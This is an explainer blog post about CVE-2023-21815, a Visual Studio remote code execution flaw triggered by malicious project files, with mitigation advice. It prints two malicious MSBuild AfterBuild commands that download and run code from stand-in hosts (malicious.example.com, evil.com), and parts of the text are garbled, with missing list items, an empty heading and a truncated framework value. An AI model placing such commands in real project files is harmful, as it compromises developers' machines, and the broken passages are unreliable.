CVE-2023-21815 - Visual Studio Remote Code Execution Vulnerability Explained

*Published June 2024*

Introduction

In February 2023, Microsoft disclosed a critical security flaw—CVE-2023-21815—affecting Visual Studio, its popular development environment used by millions worldwide. This post breaks down what the vulnerability is, how it works, real-world exploit options, and how to stay safe. We'll use clear language, real code snippets, and provide references for deeper reading.

What is CVE-2023-21815?

CVE-2023-21815 is a Remote Code Execution (RCE) vulnerability in Visual Studio. In simple terms, this means an attacker can run arbitrary code on a victim’s computer, just by getting them to open a malicious solution (or project) file in Visual Studio.

Official Microsoft description

> *"A remote code execution vulnerability exists in Visual Studio when the software loads a malicious repository containing crafted files."*

How Does the Attack Work?

The vulnerability is triggered when a specially crafted Visual Studio project or solution file is opened. Visual Studio can automatically execute tasks (like building or debugging) through configuration files (like project files: .csproj, .vbproj, .sln, etc). If these files contain malicious entries, Visual Studio may end up running commands defined there.

Send you a malicious GitHub repo, email, or website link.

2. Trick you into opening the solution/project in Visual Studio.

Code Example: Malicious MSBuild Command

Inside a Visual Studio project file (such as .csproj), an attacker can embed commands that trigger on build events.

Benign Example

<Target Name="AfterBuild">
  <Exec Command="echo Hello, this is safe!" />
</Target>

Malicious Example

<Target Name="AfterBuild">
  <Exec Command="powershell -ExecutionPolicy Bypass -NoP 'Invoke-WebRequest http://malicious.example.com/payload.exe -OutFile C:\Temp\payload.exe; Start-Process C:\Temp\payload.exe'" />
</Target>

*This downloads and runs a dangerous executable from the internet.*

Victim Opens in Visual Studio

- Victim clones/downloads and opens the project file.
  - Visual Studio may trigger the "AfterBuild" event automatically—especially when restoring NuGet packages or compiling.

Microsoft published their own advisory and patch

- Microsoft Security Update Guide: CVE-2023-21815
- Visual Studio Release Notes 17.5

Community Write-ups

- GitHub Security Lab: Malicious Build Events *(Related to build events, not CVE-specific but explains the danger)*
- PortSwigger: Attacking CI/CD pipelines

1. Attacker’s malicious .csproj

<Project Sdk="Microsoft.NET.Sdk">
  <PropertyGroup>
    <OutputType>Exe</OutputType>
    <TargetFramework>net6.</TargetFramework>
  </PropertyGroup>
  <Target Name="AfterBuild">
    <Exec Command="powershell -nop -c &quot;IEX (New-Object Net.WebClient).DownloadString('http://evil.com/bad.ps1';)&quot;" />
  </Target>
</Project>

2. Victim opens and builds.

Update Visual Studio:

Microsoft fixed this vulnerability in Visual Studio 2022 version 17.5 and later. Update immediately from Visual Studio Downloads.

Open .csproj, .vbproj, and .sln files in Notepad and check for suspicious <Exec> commands.

- Disable automatic builds/restores:

Conclusion

CVE-2023-21815 is a textbook example of how build systems, if not carefully handled, can become dangerous. Visual Studio is incredibly powerful, but with great power comes great risk if you open unknown code—patch, review, and always verify your sources.

References

- Microsoft CVE-2023-21815 Advisory
- CERT Advisory
- PortSwigger Write-Up


*Stay safe, update often, and always check that project file before you click "build!"*

Timeline

Published on: 02/14/2023 21:15:00 UTC
Last modified on: 04/11/2023 21:15:00 UTC